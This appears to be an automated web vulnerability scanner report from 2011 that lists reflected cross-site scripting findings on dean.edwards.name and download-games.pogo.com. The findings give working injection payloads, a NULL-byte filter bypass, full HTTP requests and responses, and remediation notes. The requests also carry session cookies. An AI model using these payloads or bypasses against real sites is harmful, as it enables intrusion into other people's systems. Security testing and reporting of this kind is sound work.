The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %00cf310<a>f30753d02ee was submitted in the REST URL parameter 1. This input was echoed as cf310<a>f30753d02ee in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00cf310<a>f30753d02ee/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:10:39 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1644 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5c8b"><script>alert(1)</script>133040de622 was submitted in the REST URL parameter 1. This input was echoed as b5c8b"><script>alert(1)</script>133040de622 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00b5c8b"><script>alert(1)</script>133040de622/2006/06/again/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:10:37 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1790 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61c9d<a>82844ccdc7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/again61c9d<a>82844ccdc7b/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 02:11:27 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Sun, 09 Jan 2011 02:11:27 GMT Last-Modified: Sun, 09 Jan 2011 02:11:27 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8
3.471. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dean.edwards.name
Path:
/weblog/2006/06/again/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff341"><script>alert(1)</script>a6f101894d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff341\"><script>alert(1)</script>a6f101894d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?ff341"><script>alert(1)</script>a6f101894d=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19ef4"%3balert(1)//ceec74c2135 was submitted in the refid parameter. This input was echoed as 19ef4";alert(1)//ceec74c2135 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?site=pogo&refid=19ef4"%3balert(1)//ceec74c2135&ifw=756&pageSection=header_downloads&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 134282 Cache-Control: private, max-age=14348 Date: Sun, 09 Jan 2011 02:09:39 GMT Connection: close
<HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" /> <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]...
var s_pageName="HomePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="19ef4";alert(1)//ceec74c2135"; var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the refid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4a51"%3balert(1)//b1d0df0e2a0 was submitted in the refid parameter. This input was echoed as f4a51";alert(1)//b1d0df0e2a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?site=pogo&refid=headernav_fp_shopmenuf4a51"%3balert(1)//b1d0df0e2a0&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/account/my-account/main.do Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 138764 Cache-Control: private, max-age=14372 Date: Sun, 09 Jan 2011 02:09:06 GMT Connection: close
<HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" /> <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... omePage" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products=";" var s_eVar1="" var s_eVar2="" var s_eVar6="headernav_fp_shopmenuf4a51";alert(1)//b1d0df0e2a0"; var s_eVar7="Home Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="103"; var s_ ...[SNIP]...
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b7aed"%20a%3db%20afd5e41295f was submitted in the refid parameter. This input was echoed as b7aed" a=b afd5e41295f in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /?site=pogo&refid=%00b7aed"%20a%3db%20afd5e41295f&ifw=756&pageSection=header_downloads&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 133128 Cache-Control: private, max-age=14395 Date: Sun, 09 Jan 2011 02:09:02 GMT Connection: close
The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4970"style%3d"x%3aexpr/**/ession(alert(1))"b60ab2ea664 was submitted in the refid parameter. This input was echoed as c4970"style="x:expr/**/ession(alert(1))"b60ab2ea664 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?site=pogo&refid=headernav_fp_shopmenuc4970"style%3d"x%3aexpr/**/ession(alert(1))"b60ab2ea664&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x HTTP/1.1 Host: download-games.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/account/my-account/main.do Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 144112 Cache-Control: private, max-age=14343 Date: Sun, 09 Jan 2011 02:08:53 GMT Connection: close
<HTML> <HEAD> <meta name="msvalidate.01" content="F6F676EB374D905262C4FF19D14E715D" /> <meta name="description" content="Download games at Pogo including puzzle games, hidden object games, Pogo ...[SNIP]... <tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=headernav_fp_shopmenuc4970"style="x:expr/**/ession(alert(1))"b60ab2ea664&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" > ...[SNIP]...
The value of the SortBy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125db"style%3d"x%3aexpr/**/ession(alert(1))"7c938b75106 was submitted in the SortBy parameter. This input was echoed as 125db"style="x:expr/**/ession(alert(1))"7c938b75106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /AllGames.aspx?SortBy=gameName125db"style%3d"x%3aexpr/**/ession(alert(1))"7c938b75106&sDir=ASC&Page=1 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 62015 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:10:12 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem, ...[SNIP]... <a href="/AllGames.aspx?SortBy=gameName125db"style="x:expr/**/ession(alert(1))"7c938b75106&sDir=ASC&Page=0" id="_ctl0_AllGamesUC1_oPagingBarUC_lnkPrev" class="txt11bg" style="text-decoration: underline"> ...[SNIP]...
The value of the sDir request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28368"style%3d"x%3aexpr/**/ession(alert(1))"1b59e9936ad was submitted in the sDir parameter. This input was echoed as 28368"style="x:expr/**/ession(alert(1))"1b59e9936ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /AllGames.aspx?SortBy=gameName&sDir=ASC28368"style%3d"x%3aexpr/**/ession(alert(1))"1b59e9936ad&Page=1 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 62760 Cache-Control: private, max-age=14341 Date: Sun, 09 Jan 2011 02:10:46 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <meta name="description" content="Try all downloadable games at Pogo for free including Picktureka! Museum Mayhem, ...[SNIP]... <a href="/AllGames.aspx?SortBy=gameName&sDir=ASC28368"style="x:expr/**/ession(alert(1))"1b59e9936ad&Page=0" id="_ctl0_AllGamesUC1_oPagingBarUC_lnkPrev" class="txt11bg" style="text-decoration: underline"> ...[SNIP]...
The value of the RefID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62ffb"style%3d"x%3aexpr/**/ession(alert(1))"6ae1f7f4fc6 was submitted in the RefID parameter. This input was echoed as 62ffb"style="x:expr/**/ession(alert(1))"6ae1f7f4fc6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Category.aspx?code=1002&genre=New&RefID=62ffb"style%3d"x%3aexpr/**/ession(alert(1))"6ae1f7f4fc6&Session=&orign=p_leftbar_catName&ln=en&=0 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 63438 Cache-Control: private, max-age=14380 Date: Sun, 09 Jan 2011 02:10:11 GMT Connection: close
<meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor ...[SNIP]... <tr style="cursor:hand;" onclick="window.location.href='/Category.aspx?code=110051313&genre=Pogo Originals&RefID=62ffb"style="x:expr/**/ession(alert(1))"6ae1f7f4fc6&Session=&orign=p_leftbar_catName&ln=en&=0'" height="25" Id="Cat_110051313" onmouseover="TurnOn(this.id,'on');" onmouseout="TurnOn(this.id,'off');" > ...[SNIP]...
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0a9c"%3balert(1)//14e5022abab was submitted in the RefID parameter. This input was echoed as b0a9c";alert(1)//14e5022abab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Category.aspx?code=1002&genre=New&RefID=b0a9c"%3balert(1)//14e5022abab&Session=&orign=p_leftbar_catName&ln=en&=0 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 60850 Cache-Control: private, max-age=14344 Date: Sun, 09 Jan 2011 02:10:22 GMT Connection: close
<meta name="description" content="Download new games at Pogo including Plants vs. Zombies, Mystic Empor ...[SNIP]... ategory - [newGames]" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products="newGames;" var s_eVar1="" var s_eVar2="" var s_eVar6="b0a9c";alert(1)//14e5022abab"; var s_eVar7="Category Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="121"; va ...[SNIP]...
The value of the refId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 411ba"%3balert(1)//c28d43abb37 was submitted in the refId parameter. This input was echoed as 411ba";alert(1)//c28d43abb37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Category.aspx?code=1000&refId=Hot_Sellers411ba"%3balert(1)//c28d43abb37 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 61368 Cache-Control: private, max-age=14400 Date: Sun, 09 Jan 2011 02:10:14 GMT Connection: close
...[SNIP]... p_games]" /* E-commerce Variables */ var s_state="" var s_zip="" var s_purchaseID="" var s_events="" var s_products="top_games;" var s_eVar1="" var s_eVar2="" var s_eVar6="Hot_Sellers411ba";alert(1)//c28d43abb37"; var s_eVar7="Category Page"; var s_eVar10="oberonpogostd"; var s_Prop10="oberonpogostd";
/* You may add or alter any code config here. */ var s_server="102"; va ...[SNIP]...
The value of the refId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818ae"style%3d"x%3aexpr/**/ession(alert(1))"026389c2ee8 was submitted in the refId parameter. This input was echoed as 818ae"style="x:expr/**/ession(alert(1))"026389c2ee8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /Category.aspx?code=1000&refId=Hot_Sellers818ae"style%3d"x%3aexpr/**/ession(alert(1))"026389c2ee8 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 63956 Cache-Control: private, max-age=14353 Date: Sun, 09 Jan 2011 02:10:06 GMT Connection: close
The value of the RefID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %008cad4"%3balert(1)//fef0500bb88 was submitted in the RefID parameter. This input was echoed as 8cad4";alert(1)//fef0500bb88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /deluxe.aspx?code=119761357&RefID=pogofree010711%008cad4"%3balert(1)//fef0500bb88 HTTP/1.1 Host: download-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Content-Type: text/html; charset=utf-8 Content-Length: 39950 Cache-Control: private, max-age=14373 Date: Sun, 09 Jan 2011 02:08:55 GMT Connection: close
